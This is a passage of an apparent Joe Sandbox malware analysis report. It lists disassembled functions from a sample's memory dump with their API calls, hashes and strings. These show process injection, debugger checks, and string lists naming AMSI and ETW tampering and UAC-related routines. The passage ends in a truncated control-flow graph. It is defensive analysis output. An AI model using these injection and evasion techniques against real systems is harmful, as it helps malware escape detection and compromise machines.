                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                          • String ID: ntdll$yromeMlautriVetacollAwZ
                                                          • API String ID: 4072585319-445027087
                                                          • Opcode ID: b7dcf1cfff199dbdf0a070df765ad8e05a5ced4f9d631d29be7ff09c8ca3690a
                                                          • Instruction ID: 5b285567f76c2680c2a7f64f41c29422efeabb90ed1c082bddc9a76d1ce86f58
                                                          • Opcode Fuzzy Hash: b7dcf1cfff199dbdf0a070df765ad8e05a5ced4f9d631d29be7ff09c8ca3690a
                                                          • Instruction Fuzzy Hash: 35111E7964420CBFEB44EFE9EC81EEEB7ADEB4C710F504461BA04D7680D670AE148B65
                                                          Function 02907A2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 029081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0290823C,?,?,00000000,?,02907A7E,ntdll,00000000,00000000,02907AC3,?,?,00000000), ref: 0290820A
                                                            • Part of subcall function 029081CC: GetModuleHandleA.KERNELBASE(?), ref: 0290821E
                                                            • Part of subcall function 02908274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029082FC,?,?,00000000,00000000,?,02908215,00000000,KernelBASE,00000000,00000000,0290823C), ref: 029082C1
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029082C7
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(?,?), ref: 029082D9
                                                          • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02907A9F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                          • String ID: ntdll$yromeMlautriVetacollAwZ
                                                          • API String ID: 4072585319-445027087
                                                          • Opcode ID: 3ceaac7fbf8add7030f563939cde0fe6b8ecaf24c3a3ebaf821e641f6ec91028
                                                          • Instruction ID: 560a0ebbafff178c582427db8417d6a14d33c942e9aa2e84e88ab6c8fe1f7d73
                                                          • Opcode Fuzzy Hash: 3ceaac7fbf8add7030f563939cde0fe6b8ecaf24c3a3ebaf821e641f6ec91028
                                                          • Instruction Fuzzy Hash: F3111E7964420CBFEB44EFD9EC81EEEB7ADEB4C710F504461BA04D7680D670AA148B65
                                                          Function 02907D78 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 029081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0290823C,?,?,00000000,?,02907A7E,ntdll,00000000,00000000,02907AC3,?,?,00000000), ref: 0290820A
                                                            • Part of subcall function 029081CC: GetModuleHandleA.KERNELBASE(?), ref: 0290821E
                                                            • Part of subcall function 02908274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029082FC,?,?,00000000,00000000,?,02908215,00000000,KernelBASE,00000000,00000000,0290823C), ref: 029082C1
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029082C7
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(?,?), ref: 029082D9
                                                          • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02907DEC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                          • String ID: Ntdll$yromeMlautriVetirW
                                                          • API String ID: 2719805696-3542721025
                                                          • Opcode ID: 54a1daee43509a1e9e4c5da3690b0961d8d4af8fe843192636f9ee8ddabe28fc
                                                          • Instruction ID: 1d607a0334de6a4e61a1b2dc46fb56f9d5d74d8dceaad7719cd3580df59716b6
                                                          • Opcode Fuzzy Hash: 54a1daee43509a1e9e4c5da3690b0961d8d4af8fe843192636f9ee8ddabe28fc
                                                          • Instruction Fuzzy Hash: 6601E979644309AFDB40EFD8EC81EABB7EDEB89710F504851BA08D7690D630AD148B65
                                                          Function 02908730 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21nativethreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 029081CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0290823C,?,?,00000000,?,02907A7E,ntdll,00000000,00000000,02907AC3,?,?,00000000), ref: 0290820A
                                                            • Part of subcall function 029081CC: GetModuleHandleA.KERNELBASE(?), ref: 0290821E
                                                            • Part of subcall function 02908274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029082FC,?,?,00000000,00000000,?,02908215,00000000,KernelBASE,00000000,00000000,0290823C), ref: 029082C1
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029082C7
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(?,?), ref: 029082D9
                                                          • NtQueueApcThread.NTDLL(?,?,?,?,?), ref: 02908761
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HandleModule$AddressProc$QueueThread
                                                          • String ID: NtQueueApcThread$ntdll
                                                          • API String ID: 3075473611-1374908105
                                                          • Opcode ID: 0f1b4a35a10dcd79bdc434f3b2d44b8410f6131992b8e4dd410885eadcd256e9
                                                          • Instruction ID: a314a46b6e77b491bb72785fe49b4037d91c3d031d0b54858b23130781e16e68
                                                          • Opcode Fuzzy Hash: 0f1b4a35a10dcd79bdc434f3b2d44b8410f6131992b8e4dd410885eadcd256e9
                                                          • Instruction Fuzzy Hash: 7EE026B278420DAF9B80EEDDE885D9B7BECBB4D6507044401FA09D7241C670E9648B61
                                                          Function 0290DBB0 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlI.N(?,?,00000000,0290DC7E), ref: 0290DC2C
                                                          • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0290DC7E), ref: 0290DC42
                                                          • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0290DC7E), ref: 0290DC61
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Path$DeleteFileNameName_
                                                          • String ID:
                                                          • API String ID: 4284456518-0
                                                          • Opcode ID: 1858dfa102572ee8f99bac9a97b3295ac2ec5dc4163ecf9050f2831ae2f9a3de
                                                          • Instruction ID: 0cb3151d3798165a4fc6b0607e4b08522ddd837767c75b642679d090cb2b02fc
                                                          • Opcode Fuzzy Hash: 1858dfa102572ee8f99bac9a97b3295ac2ec5dc4163ecf9050f2831ae2f9a3de
                                                          • Instruction Fuzzy Hash: A2016D79A4420CAEEB05EBE08DC2FCD77B9EB85704F5144A29200E60C1EBB4AB048B35
                                                          Function 0290DC04 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 028F4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 028F4F2E
                                                          • RtlI.N(?,?,00000000,0290DC7E), ref: 0290DC2C
                                                          • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0290DC7E), ref: 0290DC42
                                                          • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0290DC7E), ref: 0290DC61
                                                            • Part of subcall function 028F4C60: SysFreeString.OLEAUT32(0290F4A4), ref: 028F4C6E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: PathString$AllocDeleteFileFreeNameName_
                                                          • String ID:
                                                          • API String ID: 1530111750-0
                                                          • Opcode ID: 0c2222b1edfd8f1f42337401b2f4cb7a11ead052e1652df0e6200961e43839b6
                                                          • Instruction ID: e09b3a141a69a4ddc75a0ca6d9c0dc867e6c9ed6ce360e82447b03fe8f6206ab
                                                          • Opcode Fuzzy Hash: 0c2222b1edfd8f1f42337401b2f4cb7a11ead052e1652df0e6200961e43839b6
                                                          • Instruction Fuzzy Hash: 6B01217594020CBEEB01EBE4DD82FCEB3ADEB48700F5144A2A204E25C0EB746B048A75
                                                          Function 02906DC8 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 02906D6C: CLSIDFromProgID.OLE32(00000000,?,00000000,02906DB9,?,?,?,00000000), ref: 02906D99
                                                          • CoCreateInstance.OLE32(?,00000000,00000005,02906EAC,00000000,00000000,02906E2B,?,00000000,02906E9B), ref: 02906E17
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFromInstanceProg
                                                          • String ID:
                                                          • API String ID: 2151042543-0
                                                          • Opcode ID: 1584680628f69887b19681a49192cb992e221d565d491793e4b889180627b76b
                                                          • Instruction ID: 6f837018947d0347843e1dab1b57296295b6aedea8149b8d92b92697b7eec65a
                                                          • Opcode Fuzzy Hash: 1584680628f69887b19681a49192cb992e221d565d491793e4b889180627b76b
                                                          • Instruction Fuzzy Hash: 2D01F235208708AEF711EF65DCA286FBBFDEB89B00B510875F505E26C0E731AA30C861
                                                          Function 0290F7C8 Relevance: 229.6, APIs: 8, Strings: 118, Instructions: 9071COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InetIsOffline.URL(00000000,00000000,0291B784,?,?,?,00000000,00000000), ref: 0290F801
                                                            • Part of subcall function 029089D0: FreeLibrary.KERNEL32(74D10000,00000000,00000000,00000000,00000000,0297738C,Function_0000662C,00000004,0297739C,0297738C,05F5E103,00000040,029773A0,74D10000,00000000,00000000), ref: 02908AAA
                                                            • Part of subcall function 0290F6E8: GetModuleHandleW.KERNEL32(KernelBase,?,0290FAEB,UacInitialize,02977380,0291B7B8,OpenSession,02977380,0291B7B8,ScanBuffer,02977380,0291B7B8,ScanString,02977380,0291B7B8,Initialize), ref: 0290F6EE
                                                            • Part of subcall function 0290F6E8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0290F700
                                                            • Part of subcall function 0290F744: GetModuleHandleW.KERNEL32(KernelBase), ref: 0290F754
                                                            • Part of subcall function 0290F744: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0290F766
                                                            • Part of subcall function 0290F744: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0290F77D
                                                            • Part of subcall function 028F7E5C: GetFileAttributesA.KERNEL32(00000000,?,0291041F,ScanString,02977380,0291B7B8,OpenSession,02977380,0291B7B8,ScanString,02977380,0291B7B8,UacScan,02977380,0291B7B8,UacInitialize), ref: 028F7E67
                                                            • Part of subcall function 028FC364: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02A6B8B8,?,02910751,ScanBuffer,02977380,0291B7B8,OpenSession,02977380,0291B7B8,ScanBuffer,02977380,0291B7B8,OpenSession), ref: 028FC37B
                                                            • Part of subcall function 0290DD70: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0290DE40), ref: 0290DDAB
                                                            • Part of subcall function 0290DD70: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0290DE40), ref: 0290DDDB
                                                            • Part of subcall function 0290DD70: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0290DDF0
                                                            • Part of subcall function 0290DD70: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0290DE1C
                                                            • Part of subcall function 0290DD70: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0290DE25
                                                            • Part of subcall function 028F7E80: GetFileAttributesA.KERNEL32(00000000,?,0291356F,ScanString,02977380,0291B7B8,OpenSession,02977380,0291B7B8,ScanBuffer,02977380,0291B7B8,OpenSession,02977380,0291B7B8,Initialize), ref: 028F7E8B
                                                            • Part of subcall function 028F8048: CreateDirectoryA.KERNEL32(00000000,00000000,?,0291370D,OpenSession,02977380,0291B7B8,ScanString,02977380,0291B7B8,Initialize,02977380,0291B7B8,ScanString,02977380,0291B7B8), ref: 028F8055
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
                                                          • String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZER$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
                                                          • API String ID: 297057983-2894825931
                                                          • Opcode ID: 534c718d8992d224c829bfd4d7c35b8314956717e20637cb839c2b3ca978453e
                                                          • Instruction ID: c4537a1708da32be1905d6aa8bfe892a09e7f5fefd0f1ffa71eb687c6e3a0aed
                                                          • Opcode Fuzzy Hash: 534c718d8992d224c829bfd4d7c35b8314956717e20637cb839c2b3ca978453e
                                                          • Instruction Fuzzy Hash: F914E93CB0421DCFDB50EB68DC90ADB73BABF85304F5040E69609EB654DA30AE958F56
                                                          Function 02918128 Relevance: 163.8, APIs: 5, Strings: 87, Instructions: 2778processthreadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 4574 2918128-2918517 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f48ec 4689 29193a1-2919524 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f48ec 4574->4689 4690 291851d-29186f0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f47ec call 28f49a0 call 28f4d74 call 28f4df0 CreateProcessAsUserW 4574->4690 4779 2919cf5-291b2fa call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 * 16 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f46d4 * 2 call 29089d0 call 28f46d4 * 2 call 29089d0 call 2907c10 call 2908338 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 ExitProcess 4689->4779 4780 291952a-2919539 call 28f48ec 4689->4780 4797 29186f2-2918769 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 4690->4797 4798 291876e-2918879 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 4690->4798 4780->4779 4788 291953f-2919812 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 28f49a0 call 28f46d4 call 29089d0 call 290f094 call 28f4860 call 28f49a0 call 28f46d4 call 28f4860 call 28f49a0 call 28f46d4 call 28f47ec call 